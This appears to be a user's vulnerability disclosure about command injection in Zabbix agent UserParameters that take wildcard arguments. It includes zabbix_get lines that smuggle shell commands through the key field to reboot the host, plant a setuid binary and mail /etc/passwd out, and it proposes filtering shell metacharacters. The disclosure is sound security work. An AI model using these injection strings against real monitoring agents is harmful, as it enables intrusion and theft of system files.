If you create a UserParameter which takes variable parameters, then by running zabbix_get you can use it to execute arbitrary commands as user zabbix on a machine running zabbix_agent; I'm not sure what benefit there might be to running arbitrary commands as user zabbix, but it's a concern nonetheless.

I'm running the 1.4.6 version of zabbix included with Ubuntu 8.10, so this might have been fixed since, but I downloaded the 1.6.2 source and I don't see any sign of the zabbix_agent code sanitising the parameters passed to a UserParameter command.

For example, if I add a user parameter I found on a web site for disk monitoring:

UserParameter=custom.vfs.dev.write[*],grep $1 /proc/diskstats | head -1 | awk '

'

That's innocuous by itself, but any user can run zabbix_get with command lines like these:

zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|/sbin/reboot]"
zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|cp /usr/bin/whoami /home/foo/tmp ; chmod a+xs /home/foo/tmp/whoami]"
zabbix_get -slocalhost "-kcustom.vfs.dev.write.ops[x|mail [email protected] < /etc/passwd]"

They can execute any program (reboot probably won't let zabbix run it, but some machines might), copy any arbitrary program and make it setuid zabbix, access any restricted file that zabbix might have access to, or mail themselves any file on that machine that zabbix can read.

I'm not quite sure what the best solution to this would be, but at a minimum zabbix_agent should reject any key strings containing |, ;, >, <, ", $, &, \, spaces, or other special shell characters. Even putting " around the $1 in the UserParameter definition isn't a workaround, because you can pass " characters as part of the key in the zabbix_get call.